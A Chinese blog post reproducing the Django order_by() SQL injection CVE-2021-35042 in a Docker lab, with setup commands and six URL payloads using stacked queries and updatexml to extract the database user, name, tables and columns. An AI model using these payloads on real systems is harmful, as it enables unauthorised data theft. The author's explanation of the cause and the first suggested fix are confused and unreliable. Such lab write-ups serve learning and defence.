Django之SQL隱碼攻擊漏洞復現(CVE-2021-35042)

Vice_2203發表於2022-12-25

前言

SQL隱碼攻擊的原理是對web請求，表單或域名等提交查詢的字串沒有進行安全檢測過濾，攻擊者可以拼接執行惡意SQL命令，導致使用者資料洩露

漏洞原理

Django 元件存在 SQL 注入漏洞，該漏洞是由於對 QuerySet.order_by()中使用者提供資料的過濾不足，攻擊者可利用該漏洞在未授權的情況下，構造惡意資料執行 SQL 注入攻擊，最終造成伺服器敏感資訊洩露。

以下是我自己的理解，根據Django使用的框架中，他建立了apps.py並執行，會自動生成一個models.py

models.py呼叫了Collection的這個類

然後傳送到了這邊，而models又需要migrations來遷移檔案，其中呼叫了models.AutoField，而它如果在沒有增加id這個欄位的時候，會自動增加一個自增的資料庫型別的欄位id，但恰恰在此需要設為主鍵(primary_key=True)否則又會報錯，導致錯誤將id設定為主鍵，可以執行SQL命令且沒有被過濾

所以當order==id時會出現一個自增序列的資料(可以是ID也是等於id)

而當order=-ID又會出現問題，而列印出一些敏感資訊

*影響版本

Django 3.2
Django 3.1

環境搭建

靶機: 192.168.31.230

yum-config-manager --add-repo https://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo //下載阿里的映象yum源

yum install docker-ce docker-ce-cli contaninerd.io

wget https://github.com/docker/compose/releases/download/1.25.0-rc4/docker-compose-Linux-x86_64 //下載docker-compose

service docker start
詳細docker搭建請參考此連結:https://www.cnblogs.com/BlogVice-2203/p/16977227.html

將CVE-2021-35042上傳到centos7

docker-compose build
docker-compose up -d  //啟動漏洞環境

環境啟動成功後，檢視http://your-ip:8000訪問首頁

構造poc

查當前使用者
?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20user())),1)%23

查當前資料庫
?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23

查表
?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())),1)%23

查欄位
?order=vuln_collection.name);select%20updatexml(1,concat(0x5c,(select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1),0x5c),1)%23

查欄位
?order=vuln_collection.name);select%20updatexml(1,concat(0x5c,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27vuln_collection%27limit%201,1),0x5c),1)%23

查資料
?order=vuln_collection.name);select%20updatexml(1,concat(0x5c,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27vuln_collection%27limit%201,1),0x5c),1)%23

修復建議

1.將除了id以外的其他欄位其中一個設定為主鍵（我自己對AutoField()的理解），這樣或許可以避免id成為主鍵自增，在資料庫中就沒有了主鍵id，就不會導致SQL隱碼攻擊產生
2.更新最新版本

修復SQL隱碼攻擊漏洞兩種方法
2011-03-16
SQL
Rails 3爆SQL隱碼攻擊漏洞
2012-06-05
AISQL
怎麼修復網站漏洞之metinfo遠端SQL隱碼攻擊漏洞修補
2018-11-24
網站SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊
2014-02-16
SQL
【網路安全】什麼是SQL隱碼攻擊漏洞?SQL隱碼攻擊的特點!
2021-09-06
SQL
網站漏洞修復SQL隱碼攻擊防護辦法
2021-02-04
網站SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句注入
2014-02-16
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句修改
2014-02-16
SQL
PHP常見漏洞（1）–SQL隱碼攻擊
2017-11-08
PHPSQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-驗證檢查
2014-02-16
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-繫結變數
2014-02-16
SQL變數
SQL隱碼攻擊
2014-04-02
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-顯式格式化模型
2014-02-16
SQL模型
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-資料型別轉換
2014-02-16
SQL資料型別
如何做好防護SQL隱碼攻擊漏洞
2020-06-01
SQL
安全漏洞問題6：SQL隱碼攻擊
2017-11-21
SQL
WordPress SQL隱碼攻擊漏洞與提權分析
2015-08-25
SQL
SQL隱碼攻擊漏洞測試工具比較
2012-02-02
SQL
WAF攻防之SQL隱碼攻擊篇
2018-02-26
SQL
【SQL Server】--SQL隱碼攻擊
2015-01-31
SQLServer
MYSQL SQL隱碼攻擊
2021-11-20
MySql
【SQL隱碼攻擊原理】
2018-01-17
SQL
防止SQL隱碼攻擊
2010-04-20
SQL
SQL隱碼攻擊（一）
2009-12-14
SQL
Joomla CMS 3.2-3.4.4 SQL隱碼攻擊漏洞分析
2020-08-19
OOMSQL
（轉）Discuz!X2.0SQL隱碼攻擊漏洞EXP
2017-11-15
SQL
WEB三大攻擊之—SQL隱碼攻擊與防護
2019-01-28
WebSQL
SQL隱碼攻擊原理是什麼?如何防範SQL隱碼攻擊？
2022-11-24
SQL
Java審計之SQL隱碼攻擊篇
2020-09-10
JavaSQL
SQL隱碼攻擊式攻擊掃描器
2008-07-15
SQL
SQL隱碼攻擊語句
2018-07-25
SQL
pikachu-SQL隱碼攻擊
2020-11-21
SQL
SQL隱碼攻擊導圖
2018-06-15
SQL
SQL隱碼攻擊問題
2017-03-30
SQL
SQL隱碼攻擊的例子
2017-03-13
SQL
ZMLCMS-SQL隱碼攻擊
2017-08-20
SQL
SQL隱碼攻擊演練
2013-09-16
SQL
預防SQL隱碼攻擊
2010-04-02
SQL

Django之SQL隱碼攻擊漏洞復現(CVE-2021-35042)

前言

漏洞原理

*影響版本

環境搭建

修復建議

相關文章